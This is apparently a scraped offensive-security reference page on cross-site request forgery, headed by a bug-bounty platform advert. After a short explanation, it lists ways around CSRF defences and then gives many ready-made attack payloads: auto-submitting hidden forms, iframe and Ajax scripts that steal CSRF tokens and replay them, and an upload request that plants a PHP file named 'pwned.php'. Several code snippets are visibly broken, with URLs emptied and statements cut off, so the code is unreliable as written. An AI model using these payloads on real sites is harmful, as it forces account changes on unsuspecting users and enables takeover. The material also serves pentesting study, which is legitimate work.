CSRF (Cross Site Request Forgery)

HackenProof is home to all crypto bug bounties.
Get rewarded without delays HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
Get experience in web3 pentesting Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
Become the web3 hacker legend Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
Sign up on HackenProof start earning from your hacks!

What is CSRF?

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. This is done by making a logged in user in the victim platform access an attacker controlled website and from there execute malicious JS code, send forms or retrieve "images" to the victims account.


In order to be able to abuse a CSRF vulnerability you first need to find a relevant action to abuse (change password or email, make the victim follow you on a social network, give you more privileges...). The session must rely only on cookies or HTTP Basic Authentication header, any other header can't be used to handle the session. An finally, there shouldn't be unpredictable parameters on the request.
Several counter-measures could be in place to avoid this vulnerability.

Common defenses

  • SameSite cookies: If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites.
  • Cross-origin resource sharing: Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may take int account the CORS policy of the victim site. Note that the CORS policy won't affect if you just want to send a GET request or a POST request from a form and you don't need to read the response.
  • Ask for the password user to authorise the action.
  • Resolve a captcha
  • Read the Referrer or Origin headers. If a regex is used it could be bypassed form example with:
    • (ends with the url)
    • (starts with the url)
  • Modify the name of the parameters of the Post or Get request
  • Use a CSRF token in each session. This token has to be send inside the request to confirm the action. This token could be protected with CORS.

CSRF map

Defences Bypass

From POST to GET

Maybe the form you want to abuse is prepared to send a POST request with a CSRF token but, you should check if a GET is also valid and if when you send a GET request the CSRF token is still being validated.

Lack of token

Some applications correctly validate the token when it is present but skip the validation if the token is omitted. In this situation, the attacker can remove the entire parameter containing the token (not just its value) to bypass the validation and deliver a CSRF attack.

CSRF token is not tied to the user session

Some applications do not validate that the token belongs to the same session as the user who is making the request. Instead, the application maintains a global pool of tokens that it has issued and accepts any token that appears in this pool. In this situation, the attacker can log in to the application using their own account, obtain a valid token, and then feed that token to the victim user in their CSRF attack.

Method bypass

If the request is using a "weird" method, check if the method override functionality is working. For example, if it's using a PUT method you can try to use a POST method and send:
This could also works sending the _method parameter inside the a POST request or using the headers:
  • X-HTTP-Method
  • X-HTTP-Method-Override
  • X-Method-Override

Custom header token bypass

If the request is adding a custom header with a token to the request as CSRF protection method, then:
  • Test the request without the Customized Token and also header.
  • Test the request with exact same length but different token.
In a further variation on the preceding vulnerability, some applications duplicate each token within a cookie and a request parameter. Or the set a csrf cookie and the checks in the backend if the csrf token sent is the one related with the cookie.
When the subsequent request is validated, the application simply verifies that the token submitted in the request parameter matches the value stored by the cookie. In this situation, the attacker can again perform a CSRF attack if the web site contains any vulnerability what would allow him to set his CSRF cookie to the victim like a CRLF.
In this case you can set the cookie trying to load a fake image and then launch the CSRF attack like in this example:
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
<img src="" onerror="document.forms[0].submit();"/>
Note that if the csrf token is related with the session cookie this attack won't work because you will need to set the victim your session, and therefore you will be attacking yourself.

Content-Type change

According to this, in order to avoid preflight requests using POST method these are the allowed Content-Type values:
  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain
However, note that the severs logic may vary depending on the Content-Type used so you should try the values mentioned and others like application/json,text/xml, application/xml.
Example (from here) of sending JSON data as text/plain:
<form id="form" method="post" action="" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>

application/json preflight request bypass

As you already know, you cannot sent a POST request with the Content-Type application/json via HTML form, and if you try to do so via XMLHttpRequest a preflight request is sent first. However, you could try to send the JSON data using the content types **text/plain and application/x-www-form-urlencoded ** just to check if the backend is using the data independently of the Content-Type. You can send a form using Content-Type: text/plain setting enctype="text/plain"
If the server is only accepting the content type "application/json", you can send the content type "text/plain; application/json" without triggering a preflight request.
You could also try to bypass this restriction by using a SWF flash file. More more information read this post.

Referrer / Origin check bypass

Avoid Referrer header
Some applications validate the Referer header when it is present in requests but skip the validation if the header is omitted.
<meta name="referrer" content="never">
Regexp bypasses
To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?")

HEAD method bypass

The first part of this CTF writeup is explained that Oak's source code, a router is set to handle HEAD requests as GET requests with no response body - a common workaround that isn't unique to Oak. Instead of a specific handler that deals with HEAD reqs, they're simply given to the GET handler but the app just removes the response body.
Therefore, if a GET request is being limited, you could just send a HEAD request that will be processed as a GET request.

Exploit Examples

Exfiltrating CSRF Token

If a CSRF token is being used as defence you could try to exfiltrate it abusing a XSS vulnerability or a Dangling Markup vulnerability.

GET using HTML tags

<img src="" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
Other HTML5 tags that can be used to automatically send a GET request are:

Form GET request

<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form method="GET" action="">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />

Form POST request

<script>history.pushState('', '', '/')</script>
<form method="POST" action="" id="csrfform">
<input type="hidden" name="email" value="[email protected]" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
document.forms[0].submit(); //Way 3 to autosubmit

Form POST request through iframe

The request is sent through the iframe withuot reloading the page
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="[email protected]" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />

Ajax POST request

var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
xh.withCredentials = true;"POST","");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
//JQuery version
type: "POST",
url: "",
data: "param=value&param2=value2"

multipart/form-data POST request

myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"

multipart/form-data POST request v2

var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;"POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

Form POST request from within an iframe

<--! expl.html -->
<body onload="envia()">
<form method="POST"id="formulario" action="">
<input type="text" id="pwd" name="pwd" value="otra nueva">
function envia(){document.getElementById("formulario").submit();}
<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>

Steal CSRF Token and send a POST request

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();"POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
xhr.send("token=" + token + "&otherparama=heyyyy");
function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous"GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
// Make the request
var GET_URL=""
var POST_URL=""

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

<form id="form1" action="" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
<script type="text/javascript">
function f1(){
<iframe id="i1" style="display:none" src="" onload="javascript:f1();"></iframe>

Steal CSRF Token and sen a POST request using an iframe and a form

<iframe id="iframe" src="" width="500" height="500" onload="read()"></iframe>
function read()
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="" enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');

Steal token and send it using 2 iframes

var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = ""+token;
<iframe id="frame1" name="frame1" src="" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>

POSTSteal CSRF token with Ajax and send a post with a form

<body onload="getData()">
<form id="form" action="" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;"GET","",true);
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;

CSRF with Socket.IO

<script src=""></script>
let socket = io('');
const username = 'admin'
socket.on('connect', () => {
socket.emit('join', {
room: username
socket.emit('my_room_event', {